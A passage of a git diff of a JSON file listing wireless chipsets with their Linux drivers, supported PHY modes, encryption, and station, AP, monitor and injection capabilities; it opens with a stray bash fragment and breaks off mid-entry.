__installer_utils_run_dependencies__dependenciesInfo=("${!1}") diff --git a/misc/devices.json b/misc/devices.json index 280efdd..0f004b9 100644 --- a/misc/devices.json +++ b/misc/devices.json @@ -1,2087 +1,2087 @@ -[ - { - "Manufacturer": "ADMtek", - "Chipset": "ADM8211, ADM8211B", - "Driver": "adm8211", - "PHY Modes": "b", - "Encrypt.": "WEP", - "Station": "?", - "Ad-hoc": "?", - "AP": "?", - "Mesh": "?", - "Monitor": "?", - "Inj.": "?", - "Bus": "PCI/CB", - "Notes": "currently broken AFAIK\nadm8211" - }, - { - "Manufacturer": "Agere", - "Chipset": "HERMES II (WL60010)", - "Driver": "wlags49_h2", - "PHY Modes": "b", - "Encrypt.": "?", - "Station": "y", - "Ad-hoc": "?", - "AP": "n", - "Mesh": "n", - "Monitor": "n", - "Inj.": "n", - "Bus": "PCI/ PCMCIA", - "Notes": "staging (vendor) driver\nwlags49_h2" - }, - { - "Manufacturer": "Agere", - "Chipset": "HERMES II.5 (WL60040)", - "Driver": "wlags49_h25", - "PHY Modes": "(a)/b/g", - "Encrypt.": "?", - "Station": "y", - "Ad-hoc": "?", - "AP": "n", - "Mesh": "n", - "Monitor": "n", - "Inj.": "n", - "Bus": "PCI/ PCMCIA", - "Notes": "staging (vendor) driver, not all devices supported\nwlags49_h25" - }, - { - "Manufacturer": "Airgo", - "Chipset": "AGN100/AGN300 pre-N", - "Driver": "agnx", - "PHY Modes": "(a)b/g", - "Encrypt.": "", - "Station": "n", - "Ad-hoc": "n", - "AP": "n", - "Mesh": "n", - "Monitor": "n", - "Inj.": "n", - "Bus": "PCI/CB", - "Notes": "driver never completed, abandoned\nagnx" - }, - { - "Manufacturer": "Airgo", - "Chipset": "AGN300 pre-N USB", - "Driver": "none", - "PHY Modes": "b/g", - "Encrypt.": "", - "Station": "", - "Ad-hoc": "", - "AP": "", - "Mesh": "", - "Monitor": "", - "Inj.": "", - "Bus": "USB 2.0", - "Notes": "devices not common" - }, - { - "Manufacturer": "Aironet /\nCisco", - "Chipset": "4500, 4800,\nCisco 340/350", - "Driver": "airo", - "PHY Modes": "b", - "Encrypt.": "WEP, WPA-TKIP", - "Station": "y", - "Ad-hoc": "?", - "AP": "?", - "Mesh": "n", - "Monitor": "y", - "Inj.": "n", - "Bus": "ISA/PCI /PCMCIA", - "Notes": "airo" - }, - { - "Manufacturer": "ALi", - "Chipset": "M4301A", - "Driver": "none", - "PHY Modes": "b", - "Encrypt.": "", - "Station": "", - "Ad-hoc": "", - "AP": "", - "Mesh": "", - "Monitor": "", - "Inj.": "", - "Bus": "PCI/CB", - "Notes": "devices not common (mainly WUSB11 v4)" - }, - { - "Manufacturer": "AMD", - "Chipset": "Alchemy AM1772", - "Driver": "none", - "PHY Modes": "b", - "Encrypt.": "", - "Station": "", - "Ad-hoc": "", - "AP": "", - "Mesh": "", - "Monitor": "", - "Inj.": "", - "Bus": "PCI/CB", - "Notes": "see this abomination" - }, - { - "Manufacturer": "Atheros", - "Chipset": "", - "Driver": "", - "PHY Modes": "", - "Encrypt.": "", - "Station": "", - "Ad-hoc": "", - "AP": "", - "Mesh": "", - "Monitor": "", - "Inj.": "", - "Bus": "", - "Notes": "" - }, - { - "Manufacturer": "Atheros", - "Chipset": "AR5000", - "Driver": "ath5k", - "PHY Modes": "a", - "Encrypt.": "", - "Station": "b", - "Ad-hoc": "b", - "AP": "b", - "Mesh": "b", - "Monitor": "y", - "Inj.": "b", - "Bus": "PCI/CB", - "Notes": "tx support currently broken\nath5k" - }, - { - "Manufacturer": "Atheros", - "Chipset": "AR5001A-AR5007EG", - "Driver": "ath5k", - "PHY Modes": "(a)/b/(g)", - "Encrypt.": "WEP, WPA, WPA2", - "Station": "y", - "Ad-hoc": "y", - "AP": "y", - "Mesh": "y", - "Monitor": "y", - "Inj.": "y", - "Bus": "PCI/PCIe /CB", - "Notes": "ath5k" - }, - { - "Manufacturer": "Atheros", - "Chipset": "AR5000-AR5007EG", - "Driver": "madwifi", - "PHY Modes": "(a)/b/(g)", - "Encrypt.": "WEP, WPA, WPA2", - "Station": "y", - "Ad-hoc": "y", - "AP": "y", - "Mesh": "?", - "Monitor": "y", - "Inj.": "?", - "Bus": "PCI/PCIe /CB", - "Notes": "superseded by ath5k" - }, - { - "Manufacturer": "Atheros", - "Chipset": "AR5513\n(Data Falcon)", - "Driver": "none", - "PHY Modes": "(a)/b/g", - "Encrypt.": "", - "Station": "", - "Ad-hoc": "", - "AP": "", - "Mesh": "", - "Monitor": "", - "Inj.": "", - "Bus": "PCI/CB", - "Notes": "somewhat relevant" - }, - { - "Manufacturer": "Atheros", - "Chipset": "AR5005U (AR5523)", - "Driver": "ar5523", - "PHY Modes": "(a)/b/g", - "Encrypt.": "WEP, WPA, WPA2", - "Station": "n", - "Ad-hoc": "n", - "AP": "n", - "Mesh": "n", - "Monitor": "y", - "Inj.": "n", - "Bus": "USB 2.0", - "Notes": "driver never completed, 5GHz mode non-functional?\nar5523" - }, - { - "Manufacturer": "Atheros", - "Chipset": "AR5005U (AR5523)", - "Driver": "athusbwlan", - "PHY Modes": "(a)/b/g", - "Encrypt.": "WEP, WPA, WPA2", - "Station": "y", - "Ad-hoc": "?", - "AP": "n", - "Mesh": "n", - "Monitor": "n", - "Inj.": "n", - "Bus": "USB 2.0", - "Notes": "obsolete vendor driver" - }, - { - "Manufacturer": "Atheros", - "Chipset": "AR9001U \n(AR9170)", - "Driver": "carl9170", - "PHY Modes": "(a)/b/g/n", - "Encrypt.": "WEP, WPA, WPA2", - "Station": "y", - "Ad-hoc": "y", - "AP": "y", - "Mesh": "n", - "Monitor": "y", - "Inj.": "y", - "Bus": "USB 2.0", - "Notes": "carl9170" - }, - { - "Manufacturer": "Atheros", - "Chipset": "AR600x", - "Driver": "ar6k", - "PHY Modes": "(a)/b/g", - "Encrypt.": "WEP, WPA, WPA2", - "Station": "y", - "Ad-hoc": "?", - "AP": "?", - "Mesh": "?", - "Monitor": "?", - "Inj.": "?", - "Bus": "SDIO", - "Notes": "" - }, - { - "Manufacturer": "Atheros", - "Chipset": "AR6003", - "Driver": "ath6kl", - "PHY Modes": "a/b/g/n", - "Encrypt.": "WEP, WPA, WPA2", - "Station": "y", - "Ad-hoc": "y", - "AP": "n", - "Mesh": "n", - "Monitor": "n", - "Inj.": "?", - "Bus": "SDIO", - "Notes": "driver currently in staging\n0271:0402\nath6kl" - }, - { - "Manufacturer": "Atheros", - "Chipset": "AR9374", - "Driver": "ath6kl", - "PHY Modes": "(a)/b/g/n", - "Encrypt.": "", - "Station": "", - "Ad-hoc": "", - "AP": "", - "Mesh": "", - "Monitor": "", - "Inj.": "", - "Bus": "USB 2.0", - "Notes": "0cf3:9375\nath6kl" - }, - { - "Manufacturer": "Atheros", - "Chipset": "AR2427+AR5008\n+AR900x", - "Driver": "ath9k", - "PHY Modes": "(a)/b/g/(n)", - "Encrypt.": "WEP, WPA, WPA2", - "Station": "y", - "Ad-hoc": "y", - "AP": "y", - "Mesh": "y", - "Monitor": "y", - "Inj.": "y", - "Bus": "PCI/PCIe /CB", - "Notes": "fcs check broken in monitor mode since ~2.6.33\nath9k" - }, - { - "Manufacturer": "Atheros", - "Chipset": "AR9002U \n(AR9271, AR7010)", - "Driver": "ath9k_htc", - "PHY Modes": "(a)/b/g/n", - "Encrypt.": "WEP, WPA, WPA2", - "Station": "y", - "Ad-hoc": "y", - "AP": "y", - "Mesh": "y", - "Monitor": "y", - "Inj.": "y", - "Bus": "USB 2.0", - "Notes": "0411:0197\nath9k_htc" - }, - { - "Manufacturer": "Qualcomm Atheros", - "Chipset": "QCA6164, QCA6174,\nQCA9880 v2, QCA9882 v2\nQCA9890 v2, QCA9892 v2", - "Driver": "ath10k", - "PHY Modes": "a/b/g/n (+ac)", - "Encrypt.": "WEP, WPA, WPA2", - "Station": "y", - "Ad-hoc": "y", - "AP": "y", - "Mesh": "n", - "Monitor": "y", - "Inj.": "y", - "Bus": "PCIe", - "Notes": "+3.11 (4.3)\n168c:003e\n168c:0041\nath10k" - }, - { - "Manufacturer": "Qualcomm Atheros", - "Chipset": "Wilocity Wil6210\n802.11ad 60GHz", - "Driver": "wil6210", - "PHY Modes": "a/b/g/n (+ac+ad)", - "Encrypt.": "", - "Station": "", - "Ad-hoc": "", - "AP": "", - "Mesh": "", - "Monitor": "", - "Inj.": "", - "Bus": "PCIe", - "Notes": "wil6210" - }, - { - "Manufacturer": "Qualcomm", - "Chipset": "WFB400", - "Driver": "none", - "PHY Modes": "(a)/b/g/n", - "Encrypt.": "", - "Station": "", - "Ad-hoc": "", - "AP": "", - "Mesh": "", - "Monitor": "", - "Inj.": "", - "Bus": "PCI/ PCIe/ CB/ USB 2.0", - "Notes": "unknown if released,\nAirgo AGN400" - }, - { - "Manufacturer": "Atmel", - "Chipset": "", - "Driver": "", - "PHY Modes": "", - "Encrypt.": "", - "Station": "", - "Ad-hoc": "", - "AP": "", - "Mesh": "", - "Monitor": "", - "Inj.": "", - "Bus": "", - "Notes": "" - }, - { - "Manufacturer": "Atmel", - "Chipset": "AT76C502A", - "Driver": "atmel", - "PHY Modes": "b", - "Encrypt.": "WEP", - "Station": "y", - "Ad-hoc": "?", - "AP": "n", - "Mesh": "n", - "Monitor": "?", - "Inj.": "n", - "Bus": "PCMCIA", - "Notes": "atmel cs" - }, - { - "Manufacturer": "Atmel", - "Chipset": "AT76C503A, AT76C505(A)", - "Driver": "at76c50x-usb", - "PHY Modes": "b", - "Encrypt.": "WEP", - "Station": "y", - "Ad-hoc": "n", - "AP": "n", - "Mesh": "n", - "Monitor": "beacons", - "Inj.": "n", - "Bus": "USB 1.0", - "Notes": "at76c50x-usb" - }, - { - "Manufacturer": "Broadcom", - "Chipset": "", - "Driver": "", - "PHY Modes": "", - "Encrypt.": "", - "Station": "", - "Ad-hoc": "", - "AP": "", - "Mesh": "", - "Monitor": "", - "Inj.": "", - "Bus": "", - "Notes": "" - }, - { - "Manufacturer": "Broadcom", - "Chipset": "BCM4301, BCM4307, BCM4306r2", - "Driver": "b43legacy", - "PHY Modes": "b/(g)", - "Encrypt.": "WEP, WPA, WPA2", - "Station": "y", - "Ad-hoc": "y", - "AP": "y", - "Mesh": "y", - "Monitor": "y", - "Inj.": "y", - "Bus": "PCI/CB/ PCMCIA", - "Notes": "ssb\nb43legacy" - }, - { - "Manufacturer": "Broadcom", - "Chipset": "BCM4306r3, BCM4311, BCM4312, BCM4309, BCM4318(E), BCM4321, BCM4322", - "Driver": "b43", - "PHY Modes": "(a)/b/g/(n)", - "Encrypt.": "WEP, WPA, WPA2", - "Station": "y", - "Ad-hoc": "y", - "AP": "y", - "Mesh": "y", - "Monitor": "y", - "Inj.": "y", - "Bus": "PCI/PCIe /CB", - "Notes": "ssb, no HT mode support\nb43" - }, - { - "Manufacturer": "Broadcom", - "Chipset": "BCM43224, BCM43225, BCM4331", - "Driver": "b43", - "PHY Modes": "(a)/b/g/n", - "Encrypt.": "WEP, WPA, WPA2", - "Station": "y", - "Ad-hoc": "y", - "AP": "y", - "Mesh": "y", - "Monitor": "y", - "Inj.": "y", - "Bus": "PCIe", - "Notes": "bcma, no HT mode support, no current 5GHz support\nb43" - }, - { - "Manufacturer": "Broadcom", - "Chipset": "BCM4311, BCM4313, BCM4321, BCM4322, BCM4322x, BCM43225, BCM43227, BCM43228", - "Driver": "wl", - "PHY Modes": "(a)/b/g/(n)", - "Encrypt.": "WEP, WPA, WPA2", - "Station": "y", - "Ad-hoc": "y", - "AP": "n", - "Mesh": "n", - "Monitor": "n", - "Inj.": "n", - "Bus": "PCIe", - "Notes": "vendor driver\nwl" - }, - { - "Manufacturer": "Broadcom", - "Chipset": "BCM4320 and other\nrndis variants", - "Driver": "rndis_wlan", - "PHY Modes": "b/g", - "Encrypt.": "", - "Station": "y", - "Ad-hoc": "y", - "AP": "n", - "Mesh": "n", - "Monitor": "n", - "Inj.": "n", - "Bus": "USB 2.0", - "Notes": "rndis wlan" - }, - { - "Manufacturer": "Broadcom", - "Chipset": "BCM4323x", - "Driver": "none", - "PHY Modes": "(a)/b/g/n", - "Encrypt.": "", - "Station": "", - "Ad-hoc": "", - "AP": "", - "Mesh": "", - "Monitor": "", - "Inj.": "", - "Bus": "USB 2.0", - "Notes": "possible future support w/ brcmfmac? (probably not)" - }, - { - "Manufacturer": "Broadcom", - "Chipset": "BCM43235, BCM43236, BCM43238 \n(chip revision dependent)", - "Driver": "brcmfmac", - "PHY Modes": "(a)/b/g/n", - "Encrypt.": "y", - "Station": "?", - "Ad-hoc": "?", - "AP": "?", - "Mesh": "?", - "Monitor": "n", - "Inj.": "n", - "Bus": "USB 2.0", - "Notes": "patch adding support recently added\nbrcmfmac" - }, - { - "Manufacturer": "Broadcom", - "Chipset": "BCM4326U", - "Driver": "none", - "PHY Modes": "b/g", - "Encrypt.": "", - "Station": "", - "Ad-hoc": "", - "AP": "", - "Mesh": "", - "Monitor": "", - "Inj.": "", - "Bus": "USB 2.0", - "Notes": "" - }, - { - "Manufacturer": "Broadcom", - "Chipset": "BCM4329", - "Driver": "brcmfmac", - "PHY Modes": "a/b/g/n", - "Encrypt.": "WEP, WPA, WPA2", - "Station": "y", - "Ad-hoc": "?", - "AP": "?", - "Mesh": "?", - "Monitor": "n", - "Inj.": "n", - "Bus": "SDIO", - "Notes": "brcmfmac" - }, - { - "Manufacturer": "Broadcom", - "Chipset": "BCM43224, BCM43225", - "Driver": "brcmsmac", - "PHY Modes": "(a)/b/g/n", - "Encrypt.": "WEP, WPA, WPA2", - "Station": "y", - "Ad-hoc": "?", - "AP": "?", - "Mesh": "?", - "Monitor": "y", - "Inj.": "?", - "Bus": "PCIe", - "Notes": "BCMA\nbrcmsmac" - }, - { - "Manufacturer": "Conexant", - "Chipset": "", - "Driver": "", - "PHY Modes": "", - "Encrypt.": "", - "Station": "", - "Ad-hoc": "", - "AP": "", - "Mesh": "", - "Monitor": "", - "Inj.": "", - "Bus": "", - "Notes": "" - }, - { - "Manufacturer": "Conexant", - "Chipset": "CX53111", - "Driver": "none", - "PHY Modes": "b/g", - "Encrypt.": "", - "Station": "", - "Ad-hoc": "", - "AP": "", - "Mesh": "", - "Monitor": "", - "Inj.": "", - "Bus": "SDIO", - "Notes": "" - }, - { - "Manufacturer": "Conexant", - "Chipset": "CX53822", - "Driver": "none", - "PHY Modes": "(a)/b/g", - "Encrypt.": "", - "Station": "", - "Ad-hoc": "", - "AP": "", - "Mesh": "", - "Monitor": "", - "Inj.": "", - "Bus": "CF", - "Notes": "" - }, - { - "Manufacturer": "Envara", - "Chipset": "WiND502/512", - "Driver": "none", - "PHY Modes": "(a)/b/g", - "Encrypt.": "", - "Station": "", - "Ad-hoc": "", - "AP": "", - "Mesh": "", - "Monitor": "", - "Inj.": "", - "Bus": "USB 2.0", - "Notes": "WiND512 (b/g) devices common" - }, - { - "Manufacturer": "Inprocomm", - "Chipset": "IPN2120, IPN2220", - "Driver": "none", - "PHY Modes": "b/(g)", - "Encrypt.": "?", - "Station": "", - "Ad-hoc": "", - "AP": "", - "Mesh": "", - "Monitor": "", - "Inj.": "", - "Bus": "PCI/CB", - "Notes": "" - }, - { - "Manufacturer": "Inprocomm", - "Chipset": "IPN2128", - "Driver": "none", - "PHY Modes": "b", - "Encrypt.": "?", - "Station": "", - "Ad-hoc": "", - "AP": "", - "Mesh": "", - "Monitor": "", - "Inj.": "", - "Bus": "SDIO", - "Notes": "" - }, - { - "Manufacturer": "Intel", - "Chipset": "", - "Driver": "", - "PHY Modes": "", - "Encrypt.": "", - "Station": "", - "Ad-hoc": "", - "AP": "", - "Mesh": "", - "Monitor": "", - "Inj.": "", - "Bus": "", - "Notes": "" - }, - { - "Manufacturer": "Intel", - "Chipset": "PRO/Wireless 2100B", - "Driver": "ipw2100", - "PHY Modes": "b", - "Encrypt.": "?", - "Station": "y", - "Ad-hoc": "y", - "AP": "n", - "Mesh": "n", - "Monitor": "y", - "Inj.": "?", - "Bus": "PCI", - "Notes": "ipw2100" - }, - { - "Manufacturer": "Intel", - "Chipset": "PRO/Wireless 2200BG, 2915ABG", - "Driver": "ipw2200", - "PHY Modes": "(a)/b/g", - "Encrypt.": "WEP, WPA, WPA2", - "Station": "y", - "Ad-hoc": "y", - "AP": "oot", - "Mesh": "n", - "Monitor": "?", - "Inj.": "?", - "Bus": "PCI", - "Notes": "ipw2200" - }, - { - "Manufacturer": "Intel", - "Chipset": "PRO/Wireless 3945ABG", - "Driver": "iwl3945", - "PHY Modes": "a/b/g", - "Encrypt.": "WEP, WPA, WPA2", - "Station": "y", - "Ad-hoc": "y", - "AP": "n", - "Mesh": "n", - "Monitor": "y", - "Inj.": "y", - "Bus": "PCI", - "Notes": "iwl3945" - }, - { - "Manufacturer": "Intel", - "Chipset": "Wireless WiFi Link 4965AGN", - "Driver": "iwl4965", - "PHY Modes": "a/b/g/n", - "Encrypt.": "WEP, WPA, WPA2", - "Station": "y", - "Ad-hoc": "y", - "AP": "n", - "Mesh": "n", - "Monitor": "y", - "Inj.": "y", - "Bus": "PCI", - "Notes": "iwl4965" - }, - { - "Manufacturer": "Intel", - "Chipset": "WiFi Link 5100, 5150, 5300, 5350 - Centrino 100, 130, 1000, 1030, 6150, 6200, 6250, 6300", - "Driver": "iwlagn", - "PHY Modes": "(a)/b/g/n", - "Encrypt.": "WEP, WPA, WPA2", - "Station": "y", - "Ad-hoc": "y", - "AP": "n", - "Mesh": "n", - "Monitor": "y", - "Inj.": "y", - "Bus": "PCI", - "Notes": "iwlagn\niwlwifi" - }, - { - "Manufacturer": "Intel", - "Chipset": "IWMC3200 (Evans Peak)", - "Driver": "iwmc3200", - "PHY Modes": "a/b/g", - "Encrypt.": "WEP, WPA, WPA2", - "Station": "y", - "Ad-hoc": "y", - "AP": "n", - "Mesh": "n", - "Monitor": "n", - "Inj.": "n", - "Bus": "SDIO", - "Notes": "iwmc3200" - }, - { - "Manufacturer": "Intersil", - "Chipset": "", - "Driver": "", - "PHY Modes": "", - "Encrypt.": "", - "Station": "", - "Ad-hoc": "", - "AP": "", - "Mesh": "", - "Monitor": "", - "Inj.": "", - "Bus": "", - "Notes": "" - }, - { - "Manufacturer": "Intersil", - "Chipset": "PRISM 2/2.5/3 \nPCI/CF/PCMCIA", - "Driver": "hostap", - "PHY Modes": "b", - "Encrypt.": "?", - "Station": "y", - "Ad-hoc": "?", - "AP": "y", - "Mesh": "n", - "Monitor": "y", - "Inj.": "y", - "Bus": "PCI/CB /USB", - "Notes": "hostap" - }, - { - "Manufacturer": "Intersil", - "Chipset": "PRISM 2.5/3 USB", - "Driver": "prism2_usb", - "PHY Modes": "b", - "Encrypt.": "WEP", - "Station": "y", - "Ad-hoc": "?", - "AP": "n", - "Mesh": "n", - "Monitor": "y", - "Inj.": "b", - "Bus": "PCI/CB /USB", - "Notes": "staging driver from linux-wlan-ng\nprism2 usb" - }, - { - "Manufacturer": "Intersil", - "Chipset": "ISL3877, ISL3880,\nISL3890, ISL3886", - "Driver": "p54pci", - "PHY Modes": "(a)/b/g", - "Encrypt.": "WEP, WPA, WPA2", - "Station": "y", - "Ad-hoc": "y", - "AP": "y", - "Mesh": "y", - "Monitor": "y", - "Inj.": "y", - "Bus": "PCI/CB", - "Notes": "p54pci" - }, - { - "Manufacturer": "Intersil", - "Chipset": "ISL3880/ISL3886\n+ NET2280, ISL3887", - "Driver": "p54usb", - "PHY Modes": "(a)/b/g", - "Encrypt.": "WEP, WPA, WPA2", - "Station": "y", - "Ad-hoc": "y", - "AP": "y", - "Mesh": "y", - "Monitor": "y", - "Inj.": "y", - "Bus": "USB 2.0", - "Notes": "p54usb" - }, - { - "Manufacturer": "Lucent", - "Chipset": "HERMES I (WaveLAN\n/IEEE/ORiNOCO)", - "Driver": "orinoco", - "PHY Modes": "b", - "Encrypt.": "WEP, WPA-TKIP", - "Station": "y", - "Ad-hoc": "y", - "AP": "n", - "Mesh": "n", - "Monitor": "y", - "Inj.": "oot", - "Bus": "PCI/ PCMCIA/ USB 1.0", - "Notes": "no Bronze support\norinoco\norinoco usb" - }, - { - "Manufacturer": "Marvell", - "Chipset": "", - "Driver": "", - "PHY Modes": "", - "Encrypt.": "", - "Station": "", - "Ad-hoc": "", - "AP": "", - "Mesh": "", - "Monitor": "", - "Inj.": "", - "Bus": "", - "Notes": "" - }, - { - "Manufacturer": "Marvell\n(Libertas)", - "Chipset": "88W8310", - "Driver": "none", - "PHY Modes": "b/g", - "Encrypt.": "", - "Station": "", - "Ad-hoc": "", - "AP": "", - "Mesh": "", - "Monitor": "", - "Inj.": "", - "Bus": "PCI/CB", - "Notes": "" - }, - { - "Manufacturer": "Marvell\n(Libertas)", - "Chipset": "88W8335", - "Driver": "mrv8k", - "PHY Modes": "b/g", - "Encrypt.": "", - "Station": "", - "Ad-hoc": "", - "AP": "", - "Mesh": "", - "Monitor": "", - "Inj.": "", - "Bus": "PCI/CB", - "Notes": "mrv8k" - }, - { - "Manufacturer": "Marvell\n(Libertas)", - "Chipset": "88W8338", - "Driver": "none", - "PHY Modes": "b/g", - "Encrypt.": "", - "Station": "", - "Ad-hoc": "", - "AP": "", - "Mesh": "", - "Monitor": "", - "Inj.": "", - "Bus": "USB 2.0", - "Notes": "" - }, - { - "Manufacturer": "Marvell\n(Libertas)", - "Chipset": "88W8385,\n88W8388, 88W8686", - "Driver": "libertas", - "PHY Modes": "b/g", - "Encrypt.": "?", - "Station": "y", - "Ad-hoc": "y", - "AP": "n", - "Mesh": "n", - "Monitor": "n", - "Inj.": "n", - "Bus": "USB/CF /SDIO", - "Notes": "libertas" - }, - { - "Manufacturer": "Marvell\n(Libertas)", - "Chipset": "88W8388", - "Driver": "libertas_tf", - "PHY Modes": "b/g", - "Encrypt.": "?", - "Station": "y", - "Ad-hoc": "n", - "AP": "y", - "Mesh": "?", - "Monitor": "?", - "Inj.": "?", - "Bus": "USB/CF /SDIO", - "Notes": "OLPC XO-1,\nsupports mesh" - }, - { - "Manufacturer": "Marvell\n(TopDog)", - "Chipset": "88W8360, 88W8361,\n88W8362 (USB),\n88W8362E, 88W8363", - "Driver": "none", - "PHY Modes": "(a)/b/g/n", - "Encrypt.": "", - "Station": "", - "Ad-hoc": "", - "AP": "", - "Mesh": "", - "Monitor": "", - "Inj.": "", - "Bus": "PCI/PCIe/ CB/USB2.0", - "Notes": "" - }, - { - "Manufacturer": "Marvell\n(TopDog/\nAvastar*)", - "Chipset": "88W8366, 88W8863,\n88W8687, 88W8764*", - "Driver": "mwl8k", - "PHY Modes": "(a)/b/g/n", - "Encrypt.": "?", - "Station": "y", - "Ad-hoc": "?", - "AP": "y", - "Mesh": "?", - "Monitor": "y", - "Inj.": "?", - "Bus": "PCIe", - "Notes": "mwl8k" - }, - { - "Manufacturer": "Marvell\n(Avastar)", - "Chipset": "88W8797 (88W8786U)", - "Driver": "mwifiex", - "PHY Modes": "a/b/g/n", - "Encrypt.": "?", - "Station": "?", - "Ad-hoc": "?", - "AP": "?", - "Mesh": "?", - "Monitor": "?", - "Inj.": "?", - "Bus": "USB", - "Notes": "1286:2049\nmwifiex" - }, - { - "Manufacturer": "Marvell\n(Avastar)", - "Chipset": "88W8786, 88W8787,\n88W8797, 88W8897*", - "Driver": "mwifiex", - "PHY Modes": "a/b/g/n (+ac)*", - "Encrypt.": "?", - "Station": "?", - "Ad-hoc": "?", - "AP": "?", - "Mesh": "?", - "Monitor": "?", - "Inj.": "?", - "Bus": "SDIO", - "Notes": "02df:9139\nmwifiex" - }, - { - "Manufacturer": "Marvell\n(Avastar)", - "Chipset": "88W8766, 88W8897*", - "Driver": "mwifiex", - "PHY Modes": "a/b/g/n (+ac)*", - "Encrypt.": "?", - "Station": "?", - "Ad-hoc": "?", - "AP": "?", - "Mesh": "?", - "Monitor": "?", - "Inj.": "?", - "Bus": "PCIe", - "Notes": "11ab:2b38\nmwifiex" - }, - { - "Manufacturer": "Marvell\n(Avastar) AC*", - "Chipset": "88W8864*, 88W8897*", - "Driver": "mwlwifi", - "PHY Modes": "a/b/g/n (+ac)*", - "Encrypt.": "?", - "Station": "?", - "Ad-hoc": "?", - "AP": "?", - "Mesh": "?", - "Monitor": "?", - "Inj.": "?", - "Bus": "PCIe", - "Notes": "iwlwifi\nWRT1900\niwlwifi" - }, - { - "Manufacturer": "Marvell", - "Chipset": "unknown", - "Driver": "mrvl_cb82", - "PHY Modes": "", - "Encrypt.": "", - "Station": "", - "Ad-hoc": "", - "AP": "", - "Mesh": "", - "Monitor": "", - "Inj.": "", - "Bus": "", - "Notes": "" - }, - { - "Manufacturer": "MediaTek", - "Chipset": "", - "Driver": "", - "PHY Modes": "", - "Encrypt.": "", - "Station": "", - "Ad-hoc": "", - "AP": "", - "Mesh": "", - "Monitor": "", - "Inj.": "", - "Bus": "", - "Notes": "" - }, - { - "Manufacturer": "MediaTek", - "Chipset": "MT5911N", - "Driver": "none", - "PHY Modes": "b/g", - "Encrypt.": "", - "Station": "", - "Ad-hoc": "", - "AP": "", - "Mesh": "", - "Monitor": "", - "Inj.": "", - "Bus": "SDIO", - "Notes": "" - }, - { - "Manufacturer": "MediaTek", - "Chipset": "MT7601U", - "Driver": "mt7601u", - "PHY Modes": "a/b/g/n", - "Encrypt.": "", - "Station": "", - "Ad-hoc": "", - "AP": "", - "Mesh": "", - "Monitor": "", - "Inj.": "", - "Bus": "USB", - "Notes": "vendor driver" - }, - { - "Manufacturer": "MediaTek", - "Chipset": "MT7610U", - "Driver": "mt7601u", - "PHY Modes": "a/b/g/n (+ac)*", - "Encrypt.": "", - "Station": "", - "Ad-hoc": "", - "AP": "", - "Mesh": "", - "Monitor": "", - "Inj.": "", - "Bus": "USB", - "Notes": "vendor driver" - }, - { - "Manufacturer": "Metalink", - "Chipset": "MtW817x", - "Driver": "none", - "PHY Modes": "a/(b)/(g)/n", - "Encrypt.": "", - "Station": "", - "Ad-hoc": "", - "AP": "", - "Mesh": "", - "Monitor": "", - "Inj.": "", - "Bus": "PCI", - "Notes": "" - }, - { - "Manufacturer": "No Wires Needed", - "Chipset": "Swallow", - "Driver": "swallow_cs", - "PHY Modes": "b", - "Encrypt.": "WEP", - "Station": "y", - "Ad-hoc": "?", - "AP": "n", - "Mesh": "n", - "Monitor": "n", - "Inj.": "n", - "Bus": "PCMCIA", - "Notes": "obsolete out of kernel driver" - }, - { - "Manufacturer": "No Wires Needed", - "Chipset": "Poldhu", - "Driver": "poldhu", - "PHY Modes": "b", - "Encrypt.": "WEP", - "Station": "y", - "Ad-hoc": "y", - "AP": "n", - "Mesh": "n", - "Monitor": "n", - "Inj.": "n", - "Bus": "PCMCIA", - "Notes": "obsolete out of kernel driver\npoldhu cs" - }, - { - "Manufacturer": "Ralink", - "Chipset": "", - "Driver": "", - "PHY Modes": "", - "Encrypt.": "", - "Station": "", - "Ad-hoc": "", - "AP": "", - "Mesh": "", - "Monitor": "", - "Inj.": "", - "Bus": "", - "Notes": "" - }, - { - "Manufacturer": "Ralink", - "Chipset": "RT2460", - "Driver": "rt2400pci", - "PHY Modes": "b", - "Encrypt.": "?", - "Station": "y", - "Ad-hoc": "y", - "AP": "y", - "Mesh": "n", - "Monitor": "y", - "Inj.": "y", - "Bus": "PCI/CB", - "Notes": "" - }, - { - "Manufacturer": "Ralink", - "Chipset": "RT2560", - "Driver": "rt2500pci", - "PHY Modes": "(a)/b/g", - "Encrypt.": "WEP, WPA, WPA2", - "Station": "y", - "Ad-hoc": "y", - "AP": "y", - "Mesh": "n", - "Monitor": "y", - "Inj.": "y", - "Bus": "PCI/CB", - "Notes": "" - }, - { - "Manufacturer": "Ralink", - "Chipset": "RT2561, RT2561S, RT2661", - "Driver": "rt61pci", - "PHY Modes": "(a)/b/g", - "Encrypt.": "WEP, WPA, WPA2", - "Station": "y", - "Ad-hoc": "y", - "AP": "y", - "Mesh": "n", - "Monitor": "y", - "Inj.": "y", - "Bus": "PCI/CB", - "Notes": "" - }, - { - "Manufacturer": "Ralink", - "Chipset": "RT2571, RT2572", - "Driver": "rt2500usb", - "PHY Modes": "(a)/b/g", - "Encrypt.": "WEP, WPA, WPA2", - "Station": "y", - "Ad-hoc": "y", - "AP": "y", - "Mesh": "n", - "Monitor": "y", - "Inj.": "y", - "Bus": "USB 2.0", - "Notes": "" - }, - { - "Manufacturer": "Ralink", - "Chipset": "RT2571W, RT2573, RT2671", - "Driver": "rt73usb", - "PHY Modes": "(a)/b/g", - "Encrypt.": "WEP, WPA, WPA2", - "Station": "y", - "Ad-hoc": "y", - "AP": "y", - "Mesh": "n", - "Monitor": "y", - "Inj.": "y", - "Bus": "USB 2.0", - "Notes": "" - }, - { - "Manufacturer": "Ralink", - "Chipset": "RT2760, RT2790, RT2860, RT2880, RT2890, RT3052, RT3090, RT3091, RT3092, RT3390, RT3060, RT3062, RT3562, RT3592, RT5390, RT3290", - "Driver": "rt2800pci", - "PHY Modes": "(a)/b/g/n", - "Encrypt.": "WEP, WPA, WPA2", - "Station": "y", - "Ad-hoc": "?", - "AP": "y", - "Mesh": "?", - "Monitor": "y", - "Inj.": "y", - "Bus": "PCI/PCIe /CB", - "Notes": "Wiki" - }, - { - "Manufacturer": "Ralink", - "Chipset": "RT2760, RT2790, RT2860, RT2880, RT2890, RT3052, RT309x", - "Driver": "rt2860sta", - "PHY Modes": "(a)/b/g/n", - "Encrypt.": "WEP, WPA, WPA2", - "Station": "y", - "Ad-hoc": "?", - "AP": "y", - "Mesh": "?", - "Monitor": "y", - "Inj.": "n", - "Bus": "PCI/PCIe /CB", - "Notes": "vendor driver" - }, - { - "Manufacturer": "Ralink", - "Chipset": "RT2770, RT2870, RT2070, RT3070, RT3071, RT3072, RT3370, RT3572, RT5370, RT5572, RT8070", - "Driver": 